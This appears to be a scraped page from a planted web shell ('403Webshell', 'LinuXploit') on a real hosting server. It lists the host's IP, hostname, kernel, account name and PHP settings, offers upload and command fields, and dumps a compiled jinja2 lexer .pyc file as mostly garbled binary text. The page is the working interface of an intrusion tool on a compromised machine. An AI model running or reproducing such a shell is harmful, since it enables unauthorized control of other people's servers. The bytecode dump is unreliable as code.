- GRAYBYTE UNDETECTABLE CODES -

403Webshell
Server IP : 184.154.167.98  /  Your IP : 18.117.141.116
Web Server : Apache
System : Linux pink.dnsnetservice.com 4.18.0-553.22.1.lve.1.el8.x86_64 #1 SMP Tue Oct 8 15:52:54 UTC 2024 x86_64
User : puertode ( 1767)
PHP Version : 8.2.26
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /lib/python3.6/site-packages/jinja2/__pycache__/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /lib/python3.6/site-packages/jinja2/__pycache__/lexer.cpython-36.pyc
3

�G�\�o�#@s�dZddlZddlmZddlmZddlmZmZm	Z	m
Z
ddlmZddl
mZed�Zejd	ej�Zejd
ej�Zejd�Zyedd
d�Wn"ek
r�ejd�ZdZYnBXddlmZejdjej��ZdZddlZejd=ddlZe`[ejd�Zejd�Z ed�Z!ed�Z"ed�Z#ed�Z$ed�Z%ed�Z&ed�Z'ed�Z(ed�Z)ed �Z*ed!�Z+ed"�Z,ed#�Z-ed$�Z.ed%�Z/ed&�Z0ed'�Z1ed(�Z2ed)�Z3ed*�Z4ed+�Z5ed,�Z6ed-�Z7ed.�Z8ed/�Z9ed0�Z:ed1�Z;ed2�Z<ed3�Z=ed4�Z>ed5�Z?ed6�Z@ed7�ZAed8�ZBed9�ZCed:�ZDed;�ZEed<�ZFed=�ZGed>�ZHed?�ZIed@�ZJedA�ZKedB�ZLedC�ZMedD�ZNedE�ZOedF�ZPedG�ZQe!e9e%e(e1e0e4e:e,e6e-e7e+e5e'e2e)e*e.e/e"e&e#e3e$e8dH�ZReSdIdJ�e	eR�D��ZTeUeR�eUeT�k�s�tVdK��ejdLdMjWdNdO�eXeRdPdQ�dR�D���ZYeZeGeIeHe;eLeMeNg�Z[eZe;eOeIeNg�Z\dSdT�Z]dUdV�Z^dWdX�Z_dYdZ�Z`d[d\�ZaGd]d^�d^eb�ZcGd_d`�d`ed�ZeeGdadb�dbeb��ZfeGdcdd�ddeb��Zgdedf�ZhGdgdh�dheb�ZidS)ia�
    jinja2.lexer
    ~~~~~~~~~~~~

    This module implements a Jinja / Python combination lexer. The
    `Lexer` class provided by this module is used to do some preprocessing
    for Jinja.

    On the one hand it filters out invalid operators like the bitshift
    operators we don't allow in templates. On the other hand it separates
    template code and python code in expressions.

    :copyright: (c) 2017 by the Jinja Team.
    :license: BSD, see LICENSE for more details.
�N)�deque)�
itemgetter)�implements_iterator�intern�	iteritems�	text_type)�TemplateSyntaxError)�LRUCache�2z\s+z7('([^'\\]*(?:\\.[^'\\]*)*)'|"([^"\\]*(?:\\.[^"\\]*)*)")z\d+ufööz	<unknown>�evalz[a-zA-Z_][a-zA-Z0-9_]*F)�_identifierz[\w{0}]+Tzjinja2._identifierz(?<!\.)\d+\.\d+z(\r\n|\r|\n)�addZassignZcolonZcommaZdiv�dot�eq�floordiv�gtZgteqZlbraceZlbracketZlparen�ltZlteq�mod�mul�ne�pipe�powZrbraceZrbracketZrparenZ	semicolon�sub�tildeZ
whitespace�float�integer�name�string�operator�block_begin�	block_endZvariable_begin�variable_end�	raw_begin�raw_endZ
comment_beginZcomment_end�comment�linestatement_begin�linestatement_endZlinecomment_beginZlinecomment_end�linecomment�data�initial�eof)�+�-�/z//�*�%z**�~�[�]�(�)�{�}z==z!=�>z>=�<z<=�=�.�:�|�,�;cCsg|]\}}||f�qS�r?)�.0�k�vr?r?�/usr/lib/python3.6/lexer.py�
<listcomp>�srDzoperators droppedz(%s)r<ccs|]}tj|�VqdS)N)�re�escape)r@�xr?r?rC�	<genexpr>�srHcCs
t|�S)N)�len)rGr?r?rC�<lambda>�srJ)�keycCsL|tkrt|Stdtdtdtdtdtdtdtdt	dt
d	td
tdij
||�S)Nzbegin of commentzend of commentr$zbegin of statement blockzend of statement blockzbegin of print statementzend of print statementzbegin of line statementzend of line statementztemplate data / textzend of template)�reverse_operators�TOKEN_COMMENT_BEGIN�TOKEN_COMMENT_END�
TOKEN_COMMENT�TOKEN_LINECOMMENT�TOKEN_BLOCK_BEGIN�TOKEN_BLOCK_END�TOKEN_VARIABLE_BEGIN�TOKEN_VARIABLE_END�TOKEN_LINESTATEMENT_BEGIN�TOKEN_LINESTATEMENT_END�
TOKEN_DATA�	TOKEN_EOF�get)�
token_typer?r?rC�_describe_token_type�sr[cCs|jdkr|jSt|j�S)z#Returns a description of the token.r)�type�valuer[)�tokenr?r?rC�describe_token�s
r_cCs2d|kr&|jdd�\}}|dkr*|Sn|}t|�S)z0Like `describe_token` but for token expressions.r;�r)�splitr[)�exprr\r]r?r?rC�describe_token_expr�srccCsttj|��S)zsCount the number of newline characters in the string.  This is
    useful for extensions that filter a stream.
    )rI�
newline_re�findall)r]r?r?rC�count_newlines�srfcCs�tj}t|j�d||j�ft|j�d||j�ft|j�d||j�fg}|jdk	rp|jt|j�dd||j�f�|jdk	r�|jt|j�dd||j�f�d	d
�t	|dd�D�S)
zACompiles all the rules from the environment into a list of rules.r$�block�variableNZ
linestatementz	^[ \t\v]*r'z(?:^|(?<=\S))[^\S\r\n]*cSsg|]}|dd��qS)r`Nr?)r@rGr?r?rCrD�sz!compile_rules.<locals>.<listcomp>T)�reverse)
rErFrI�comment_start_string�block_start_string�variable_start_string�line_statement_prefix�append�line_comment_prefix�sorted)�environment�e�rulesr?r?rC�
compile_rules�s






rtc@s$eZdZdZefdd�Zdd�ZdS)�FailurezjClass that raises a `TemplateSyntaxError` if called.
    Used by the `Lexer` to specify known errors.
    cCs||_||_dS)N)�message�error_class)�selfrv�clsr?r?rC�__init__�szFailure.__init__cCs|j|j||��dS)N)rwrv)rx�lineno�filenamer?r?rC�__call__�szFailure.__call__N)�__name__�
__module__�__qualname__�__doc__rrzr}r?r?r?rCru�sruc@sTeZdZdZfZdd�ed�D�\ZZZdd�Z	dd�Z
d	d
�Zdd�Zd
d�Z
dS)�TokenzToken class.ccs|]}tt|��VqdS)N)�propertyr)r@rGr?r?rCrH�szToken.<genexpr>�cCstj||tt|��|f�S)N)�tuple�__new__r�str)ryr{r\r]r?r?rCr��sz
Token.__new__cCs*|jtkrt|jS|jdkr$|jS|jS)Nr)r\rLr])rxr?r?rC�__str__�s



z
Token.__str__cCs2|j|krdSd|kr.|jdd�|j|jgkSdS)z�Test a token against a token expression.  This can either be a
        token type or ``'token_type:token_value'``.  This can only test
        against string values and types.
        Tr;r`F)r\rar])rxrbr?r?rC�test�s

z
Token.testcGs x|D]}|j|�rdSqWdS)z(Test against multiple token expressions.TF)r�)rx�iterablerbr?r?rC�test_anys

zToken.test_anycCsd|j|j|jfS)NzToken(%r, %r, %r))r{r\r])rxr?r?rC�__repr__szToken.__repr__N)r~rr�r��	__slots__�ranger{r\r]r�r�r�r�r�r?r?r?rCr��s
r�c@s(eZdZdZdd�Zdd�Zdd�ZdS)	�TokenStreamIteratorz`The iterator for tokenstreams.  Iterate over the stream
    until the eof token is reached.
    cCs
||_dS)N)�stream)rxr�r?r?rCrzszTokenStreamIterator.__init__cCs|S)Nr?)rxr?r?rC�__iter__szTokenStreamIterator.__iter__cCs0|jj}|jtkr"|jj�t��t|j�|S)N)r��currentr\rX�close�
StopIteration�next)rxr^r?r?rC�__next__s


zTokenStreamIterator.__next__N)r~rr�r�rzr�r�r?r?r?rCr�sr�c@s~eZdZdZdd�Zdd�Zdd�ZeZedd	�d
d�Z	dd
�Z
dd�Zddd�Zdd�Z
dd�Zdd�Zdd�Zdd�ZdS)�TokenStreamz�A token stream is an iterable that yields :class:`Token`\s.  The
    parser however does not iterate over it but calls :meth:`next` to go
    one token ahead.  The current active token is stored as :attr:`current`.
    cCs>t|�|_t�|_||_||_d|_tdtd�|_	t
|�dS)NFr`�)�iter�_iterr�_pushedrr|�closedr��
TOKEN_INITIALr�r�)rx�	generatorrr|r?r?rCrz/s
zTokenStream.__init__cCst|�S)N)r�)rxr?r?rCr�8szTokenStream.__iter__cCst|j�p|jjtk	S)N)�boolr�r�r\rX)rxr?r?rC�__bool__;szTokenStream.__bool__cCs|S)Nr?)rGr?r?rCrJ?szTokenStream.<lambda>z Are we at the end of the stream?)�doccCs|jj|�dS)z Push a token back to the stream.N)r�rn)rxr^r?r?rC�pushAszTokenStream.pushcCs"t|�}|j}|j|�||_|S)zLook at the next token.)r�r�r�)rxZ	old_token�resultr?r?rC�lookEs

zTokenStream.lookr`cCsxt|�D]}t|�q
WdS)zGot n tokens ahead.N)r�r�)rx�nrGr?r?rC�skipMszTokenStream.skipcCs|jj|�rt|�SdS)zqPerform the token test and return the token if it matched.
        Otherwise the return value is `None`.
        N)r�r�r�)rxrbr?r?rC�next_ifRszTokenStream.next_ifcCs|j|�dk	S)z8Like :meth:`next_if` but only returns `True` or `False`.N)r�)rxrbr?r?rC�skip_ifYszTokenStream.skip_ifcCsX|j}|jr|jj�|_n:|jjtk	rTyt|j�|_Wntk
rR|j�YnX|S)z|Go one token ahead and return the old one.

        Use the built-in :func:`next` instead of calling this directly.
        )	r�r��popleftr\rXr�r�r�r�)rx�rvr?r?rCr�]szTokenStream.__next__cCs"t|jjtd�|_d|_d|_dS)zClose the stream.r�NT)r�r�r{rXr�r�)rxr?r?rCr�lszTokenStream.closecCst|jj|�s^t|�}|jjtkr:td||jj|j|j��td|t	|j�f|jj|j|j��z|jSt
|�XdS)z}Expect a given token type and return it.  This accepts the same
        argument as :meth:`jinja2.lexer.Token.test`.
        z(unexpected end of template, expected %r.zexpected token %r, got %rN)r�r�rcr\rXrr{rr|r_r�)rxrbr?r?rC�expectrszTokenStream.expectN)r`)r~rr�r�rzr�r�Z__nonzero__r�Zeosr�r�r�r�r�r�r�r�r?r?r?rCr�(s	
r�cCsZ|j|j|j|j|j|j|j|j|j|j	|j
|jf}tj
|�}|dkrVt|�}|t|<|S)z(Return a lexer which is probably cached.N)rk�block_end_stringrl�variable_end_stringrj�comment_end_stringrmro�trim_blocks�
lstrip_blocks�newline_sequence�keep_trailing_newline�_lexer_cacherY�Lexer)rqrKZlexerr?r?rC�	get_lexer�s"
r�c@s>eZdZdZdd�Zdd�Zd
dd�Zdd	d
�Zddd�ZdS)r�a
Class that implements a lexer for a given environment. Automatically
    created by the environment class, usually you don't have to do that.

    Note that the lexer is not automatically bound to an environment.
    Multiple environments can share the same lexer.
    cs�dd�}tj}ttdfttdfttdftt	dft
tdftt
dfg}t|�}|jrTdpVd}i�|j�r\|d�}|d||j��}|j|j�}	||	r�d||	jd��p�d7}|j|j�}	||	r�d||	jd��p�d7}|d||j��}
|
j|j�}	|	�r
d	||	jd���pd}d
}d|||j�|||j�f}
d|||j�|||j�f}|
�d
<|�d<nd||j�}
|j|_|j|_d|ddjd||j�|
||j�||j�fg�fdd�|D���tdfdf|d�tdfgt|d||j�||j�|f�ttfdf|d�td�fdfgt |d||j�||j�|f�t!dfg|t"|d||j#�||j#�f�t$dfg|t%|d||j�|
||j�||j�|f�tt&fdf|d�td�fdfgt'|d �t(dfg|t)|d!�t*t+fdfgi|_,dS)"NcSstj|tjtjB�S)N)rE�compile�M�S)rGr?r?rCrJ�sz Lexer.__init__.<locals>.<lambda>z\n?r�r+z^%s(.*)z|%sr`z(?!%s)z^[ \t]*z%s%s(?!%s)|%s\+?z%s%s%s|%s\+?rgr$z%s�rootz(.*?)(?:%s)r<z4(?P<raw_begin>(?:\s*%s\-|%s)\s*raw\s*(?:\-%s\s*|%s))cs&g|]\}}d||�j||�f�qS)z(?P<%s_begin>\s*%s\-|%s))rY)r@r��r)�	prefix_rer?rCrD�sz"Lexer.__init__.<locals>.<listcomp>z#bygroupz.+z(.*?)((?:\-%s\s*|%s)%s)z#popz(.)zMissing end of comment tagz(?:\-%s\s*|%s)%sz
\-%s\s*|%sz1(.*?)((?:\s*%s\-|%s)\s*endraw\s*(?:\-%s\s*|%s%s))zMissing end of raw directivez	\s*(\n|$)z(.*?)()(?=\n|$))-rErF�
whitespace_re�TOKEN_WHITESPACE�float_re�TOKEN_FLOAT�
integer_re�
TOKEN_INTEGER�name_re�
TOKEN_NAME�	string_re�TOKEN_STRING�operator_re�TOKEN_OPERATORrtr�r�rk�matchrj�grouprlr�r��joinr�rWrMr�rOrNrurQrRrSr�rT�TOKEN_RAW_BEGIN�
TOKEN_RAW_ENDrUrV�TOKEN_LINECOMMENT_BEGINrP�TOKEN_LINECOMMENT_ENDrs)rxrq�crrZ	tag_rulesZroot_tag_rulesZblock_suffix_reZno_lstrip_reZ
block_diff�mZcomment_diffZno_variable_reZ	lstrip_reZblock_prefix_reZcomment_prefix_rer?)r�rCrz�s�	




zLexer.__init__cCstj|j|�S)z@Called for strings and template data to normalize it to unicode.)rdrr�)rxr]r?r?rC�_normalize_newlines$szLexer._normalize_newlinesNcCs&|j||||�}t|j|||�||�S)zCCalls tokeniter + tokenize and wraps it in a token stream.
        )�	tokeniterr��wrap)rx�sourcerr|�stater�r?r?rC�tokenize(szLexer.tokenizec	csj�xb|D�]X\}}}|tkr"q�n2|dkr2d}�n"|dkrBd}�n|dkrPq�n|dkrd|j|�}n�|dkrr|}n�|d	kr�t|�}tr�|j�r�td
|||��n�|dk�ry$|j|dd��jd
d�jd�}WnHtk
�r}z*t|�j	d�dj
�}t||||��WYdd}~XnXn:|dk�r.t|�}n&|dk�rBt|�}n|dk�rTt
|}t|||�VqWdS)z�This is called with the stream as returned by `tokenize` and wraps
        every token in a :class:`Token` and converts the value.
        r%rr&r r"r#r(�keywordrzInvalid character in identifierrr`�ascii�backslashreplacezunicode-escaper;Nrrr)r"r#���r�)�ignored_tokensr�r��check_ident�isidentifierr�encode�decode�	Exceptionra�strip�intr�	operatorsr�)	rxr�rr|r{r^r]rr�msgr?r?rCr�.sD

"




z
Lexer.wrapccsRt|�}|j�}|jr>|r>x"dD]}|j|�r |jd�Pq Wdj|�}d}d}dg}	|dk	r�|dkr�|d ksvtd��|	j|d�nd}|j|	d!}
t|�}g}�x��x�|
D�]l\}
}}|
j	||�}|dkr�q�|r�|d"kr�q�t
|t��r�x�t|�D]�\}}|j
tk�r|||��n�|dk�rpx�t|j��D]0\}}|dk	�r.|||fV||jd�7}P�q.Wtd|
��n8|j|d�}|�s�|tk�r�|||fV||jd�7}�q�Wn�|j�}|dk�rN|dk�r�|jd�nv|dk�r�|jd�n`|dk�r|jd�nJ|d#k�rN|�s&td||||��|j�}||k�rNtd||f|||��|�s^|tk�rj|||fV||jd�7}|j�}|dk	�r|dk�r�|	j�nT|dk�r�xHt|j��D] \}}|dk	�r�|	j|�P�q�Wtd|
��n
|	j|�|j|	d$}
n||k�rtd|
��|}Pq�W||k�r0dStd|||f|||��q�WdS)%z�This method tokenizes the text and returns the tokens in a
        generator.  Use this method if you just want to tokenize a template.
        �
�
�
r�rr`r�Nrhrgz
invalid stateZ_beginr!r r&z#bygroupz?%r wanted to resolve the token dynamically but no group matchedrr5r6r3r4r1r2zunexpected '%s'zunexpected '%s', expected '%s'z#popzC%r wanted to resolve the new state dynamically but no group matchedz,%r yielded empty string without stack changezunexpected char %r at %d)r�r�r�)rhrgr�)r!r r&)r6r4r2r�)r�
splitlinesr��endswithrnr��AssertionErrorrsrIr��
isinstancer��	enumerate�	__class__rur�	groupdict�count�RuntimeErrorr��ignore_if_emptyr�pop�end)rxr�rr|r��lines�newline�posr{�stackZstatetokensZ
source_lengthZbalancing_stackZregex�tokensZ	new_stater��idxr^rKr]r(Zexpected_opZpos2r?r?rCr�Ws�























zLexer.tokeniter)NNN)NN)NN)	r~rr�r�rzr�r�r�r�r?r?r?rCr��s

)r�)jr�rE�collectionsrrrZjinja2._compatrrrrZjinja2.exceptionsrZjinja2.utilsr	r�r��Ur�r�r�r��SyntaxErrorr�r�Zjinja2r�format�pattern�sys�modulesr�rdZ	TOKEN_ADDZTOKEN_ASSIGNZTOKEN_COLONZTOKEN_COMMAZ	TOKEN_DIVZ	TOKEN_DOTZTOKEN_EQZTOKEN_FLOORDIVZTOKEN_GTZ
TOKEN_GTEQZTOKEN_LBRACEZTOKEN_LBRACKETZTOKEN_LPARENZTOKEN_LTZ
TOKEN_LTEQZ	TOKEN_MODZ	TOKEN_MULZTOKEN_NEZ
TOKEN_PIPEZ	TOKEN_POWZTOKEN_RBRACEZTOKEN_RBRACKETZTOKEN_RPARENZTOKEN_SEMICOLONZ	TOKEN_SUBZTOKEN_TILDEr�r�r�r�r�r�rQrRrSrTr�r�rMrNrOrUrVr�r�rPrWr�rXr��dictrLrIr�r�rpr��	frozensetr�r�r[r_rcrfrt�objectrur�r�r�r�r�r�r?r?r?rC�<module>s�






+^

Youez - 2016 - github.com/yon3zu
LinuXploit